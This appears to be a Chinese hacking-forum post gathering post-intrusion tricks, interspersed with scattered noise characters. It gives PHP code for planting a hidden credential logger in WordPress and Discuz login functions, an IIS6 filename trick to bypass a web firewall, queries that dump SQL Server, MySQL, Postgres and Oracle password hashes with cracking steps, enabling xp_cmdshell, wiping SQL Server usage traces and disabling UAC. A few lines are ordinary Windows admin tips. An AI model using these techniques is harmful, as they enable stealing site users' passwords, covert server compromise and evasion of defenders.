当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。2 I; A" n H% }- G: N! I
就是搜索case ‘login’
{; N8 N( u( G. M$ y+ S在它下面直接插入即可,记录的密码生成在pwd.txt中,
; w# R* Y- L7 V# T, q+ M% m3 J其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录
0 B- J/ C! k' O; J: t利用II6文件解析漏洞绕过安全狗代码:
4 U' Z6 U" \2 f5 i1 C- l% k;antian365.asp;antian365.jpg6 f! [2 A' [. I) K5 ^4 N
! E4 l: r( H& u$ f2 n, J" f! @各种类型数据库抓HASH破解最高权限密码!
8 K8 ~+ q. P5 u- u1.sql server2000
" I7 |$ X+ l, MSELECT password from master.dbo.sysxlogins where name='sa') B. ]7 O" l1 o9 K* I
0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341
: S) Y; F+ b3 `; h9 D _- q6 e2FD54D6119FFF04129A1D72E7C3194F7284A7F3A0 O/ L/ q! [1 p" ~, ^2 T0 V* O T
/ b: l# d! b$ e6 {& B; @( O
0×0100- constant header
6 a% ?& ?# R1 i3 }# J3 g! G34767D5C- salt
' @7 y/ S( @9 K0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash z0 F* f# g' i7 B
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash
6 O7 Y' @, B7 Scrack the upper case hash in ‘cain and abel’ and then work the case sentive hash
7 i) F- k( l6 U+ E5 K( H2 T+ p) ASQL server 2005:-9 H# i- O! Y& G5 i' }0 P. l7 G; R
SELECT password_hash FROM sys.sql_logins where name='sa', T( ?* S% _/ U9 v, @; p3 W, l3 Q
0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F6 \& N& F5 r) q/ o2 I5 k6 {
0×0100- constant header8 k% ~8 I! t9 \, k: \5 w
993BF231-salt% q* G7 E- g# J5 m% _
5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash4 @$ e9 R! J* |/ H9 b# v) X
crack case sensitive hash in cain, try brute force and dictionary based attacks.
{+ i: h( x, D1 G( O+ `% U% n) \9 _: e( U
update:- following bernardo’s comments:-# k4 b. W5 S4 X, m% B
use function fn_varbintohexstr() to cast password in a hex string.; q7 }, d- P* ]# m" b' W$ Z
e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins e6 a/ o' i, ^' Q5 o0 ?% l i
% Y8 s3 ~2 F p# ]
MYSQL:-
% N+ M( m* @3 p$ A: y* m; l& U9 y- \& h! ~" R
In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.; ^$ e3 C/ r- W- F" e" A* v+ Y
- i# g1 s% g% B- u; D" r, b*mysql < 4.1
7 B2 K0 Y+ ^; Q! c' }
: `& B7 N( h, Z& X! D8 X0 Xmysql> SELECT PASSWORD(‘mypass’);5 V B) F% R6 N! n
+——————–+) J+ n- U* \6 V/ @1 Q: U
| PASSWORD(‘mypass’) |: m- T4 A6 p5 I0 X! y! _
+——————–+
" x* W+ W: S& o ` j- L, K| 6f8c114b58f2ce9e |. q# \$ T. E0 W" x- R, p4 m4 X
+——————–+
% i5 d0 U" B! R" S
5 @8 [% ~0 e9 A$ Q, Q5 @*mysql >=4.1
! r" ^3 K/ }: b/ a$ g. M- a
% g6 K7 N" l+ A; _mysql> SELECT PASSWORD(‘mypass’);* Y$ M& |4 F9 W/ c1 c+ I; o5 g* L- _
+——————————————-+
. N3 O* h" r, j5 O- l3 p' u| PASSWORD(‘mypass’) |
1 X/ I" _8 W# r' K+ M* `1 P: r$ V+——————————————-+
/ Z4 v8 `4 T( U- T, c| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |" U4 e$ C* q! Q6 b
+——————————————-+
' C% Z$ I7 |# Q) D# R$ p+ h1 A/ u6 e( G3 O. i5 {
Select user, password from mysql.user
( d( N- [% x4 @2 iThe hashes can be cracked in ‘cain and abel’
# |; ~, x! E( L( q
' C) {* v5 b; D& n7 iPostgres:-
9 \' f1 V0 e7 M. t3 XPostgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)4 W+ |$ b! |9 L3 r# Y
select usename, passwd from pg_shadow;% D# t" Q, m5 s5 M% c5 G+ i
usename | passwd' v6 z* F' v7 c, I
——————+————————————-
8 L9 [* V4 k2 A% X% vtestuser | md5fabb6d7172aadfda4753bf0507ed43964 t$ R8 ^7 i& @1 o# R4 l. \& A5 U- w
use mdcrack to crack these hashes:-" y: a+ v* D3 ~ c q: X
$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396
8 n6 a; d% ~; v) f$ h. i1 X9 b: J% R) f/ V) e% m; B( }
Oracle:-
5 u+ L: Y3 B4 i% C! b% x' | N2 ^select name, password, spare4 from sys.user$
. k8 H) N; u3 u' x& w3 I2 t0 }hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g a9 j4 u# a% j2 ]4 e y" a7 E: g
More on Oracle later, i am a bit bored….* Z; }( {( C' H+ q: D5 Q
) [ ^. m8 n: Q# m' T- R
C/ z* k( h" g
在sql server2005/2008中开启xp_cmdshell
% g9 A( ?! x) x& K h; o! K0 T. F-- To allow advanced options to be changed.
z- i* o6 l* a# N7 F$ NEXEC sp_configure 'show advanced options', 1
3 v; E! r, J2 C& I5 D) U& {GO
! M* t1 {" d9 p' @-- To update the currently configured value for advanced options.
+ o- x: k; D8 r$ G8 G4 yRECONFIGURE
# ~; b& _/ Q. S! HGO3 @$ x* J* a# J9 T! {7 v" E5 V
-- To enable the feature.. _" X5 c) _6 V! f' s
EXEC sp_configure 'xp_cmdshell', 1. _2 z9 u0 m8 r$ s/ v7 C" C
GO
1 N& a8 G0 |2 u8 S1 M-- To update the currently configured value for this feature." P4 g; ~7 Q! a
RECONFIGURE3 z' B% P( Q" Y
GO
2 c& g2 p* q6 ~0 ^. X& Z- \6 S/ KSQL 2008 server日志清除,在清楚前一定要备份。1 l3 u, ^6 _) j& B
如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:- V3 l+ b# Q8 v0 c# v
X:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin$ U/ M' ~7 T3 t3 S+ S! R
! A* d( @3 } Q6 D对于SQL Server 2008以前的版本:( @- z5 \9 f4 j7 u; r; l, O: y2 [' q! a
SQL Server 2005:
) P( X9 |, O3 L! b7 L; [- Y, c删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat' o2 P% M$ n; r1 D; J
SQL Server 2000:
0 _& [) |2 K+ x* K" |7 t1 h清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。
+ K+ f# `, z5 A! S$ G( l8 |/ P* |3 v
本帖最后由 simeon 于 2013-1-3 09:51 编辑! S) H. P7 V! N& ^! ]
2 `4 J% Q( R' L& W8 R2 y9 b8 r* S2 l2 ]
windows 2008 文件权限修改
7 r7 c# v+ c' ~' W0 ]1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
8 p' R& P& j3 a7 p1 v2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
/ L6 d6 B" R6 P3 N8 x U一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”, ]4 h6 B) }, r+ G6 i R
9 c G8 C/ Q+ E; {9 ]! G9 G
Windows Registry Editor Version 5.004 v! M6 B* C! _* _
[HKEY_CLASSES_ROOT\*\shell\runas]
/ m. z* x# g( h! a4 {@="管理员取得所有权"0 c' {+ x, f4 f7 I9 h
"NoWorkingDirectory"=""
" k7 C/ S6 a% v; Q[HKEY_CLASSES_ROOT\*\shell\runas\command]5 F5 r' K* z- Z* L# F
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
, J2 @9 z- i% L"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"3 O/ a6 Z0 m% P5 b
[HKEY_CLASSES_ROOT\exefile\shell\runas2]# O" o2 \( A. p0 I
@="管理员取得所有权"
# @& c4 E& U" X# y3 o$ D( \"NoWorkingDirectory"=""
" z1 C- \2 y( W9 w D[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
6 [2 G" R! J' N. c3 N3 D@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
# Z7 N% p4 i5 h$ ~"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"8 F9 I" N1 D! f: A7 f
% j; y! t& U, W[HKEY_CLASSES_ROOT\Directory\shell\runas]
9 N" J8 c) a% T C- F2 }@="管理员取得所有权"
( S! ?/ k; Z! i( a) D7 I"NoWorkingDirectory"=""7 ]+ o, n" x2 m* I
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
9 N( S* |. C2 M; A* _! O@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
- q' G* U5 v c: f"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
3 H6 a* p7 z$ i) _; W
5 s' p' C4 h6 R% X! S9 M/ W+ B
T+ a8 u1 E) H6 m" q" |; d( Pwin7右键“管理员取得所有权”.reg导入
) d7 M5 R0 V2 R3 j8 z& v二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,3 w3 @* u- g( w" I# G, U) y
1、C:\Windows这个路径的“notepad.exe”不需要替换
7 e0 `# R3 G8 V* T2、C:\Windows\System32这个路径的“notepad.exe”不需要替换7 C# J" Z) C: {6 i; ]
3、四个“notepad.exe.mui”不要管, }- q3 ]# a+ g* E6 |- n" J
4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和
, R0 A) T; H( q( uC:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”
0 O% q% |- W- w; z7 B替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面," E- i/ w, z8 v& X
替换完之后回到桌面,新建一个txt文档打开看看是不是变了。
; [. i' O$ b& S4 ]windows 2008中关闭安全策略: # i& u( D3 c) e# D. T- J" M; M9 A+ h- q
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
2 F" O: S2 K# G$ e0 |/ Z修改uc_client目录下的client.php 在
! x1 R( h& Y" Z* F' h3 C l2 S" R" _function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {1 w8 B, |8 R5 e& q
下加入如上代码,在网站./data/cache/目录下自动生成csslog.php& r+ g* |) z- [, h9 S
你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw) u$ A) ]; P' S& G* \
if(getenv('HTTP_CLIENT_IP')) {
8 Z1 m. N# C: ^: B8 _) K6 i$onlineip = getenv('HTTP_CLIENT_IP');
/ d" E+ q/ W* J3 l} elseif(getenv('HTTP_X_FORWARDED_FOR')) {( |5 L7 r6 l8 e2 _
$onlineip = getenv('HTTP_X_FORWARDED_FOR');
9 F, y4 E- N6 j+ T} elseif(getenv('REMOTE_ADDR')) {' l1 }$ Q# [/ w: j5 u9 H; D8 o" k
$onlineip = getenv('REMOTE_ADDR');
# h; ?9 O5 P# x2 ?! [+ d! L8 D} else {1 u9 _0 U( h9 V; W" s
$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];$ @, M a0 b7 a+ A
}& \5 L. l% i% K4 v/ p6 ?2 ~
$showtime=date("Y-m-d H:i:s");9 v* j n7 Y9 Z7 v, ]2 {/ M
$record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
9 o& j! r' j9 x; c, a $handle=fopen('./data/cache/csslog.php','a+');
, ^4 B k, S( W8 k( l5 K& K $write=fwrite($handle,$record); |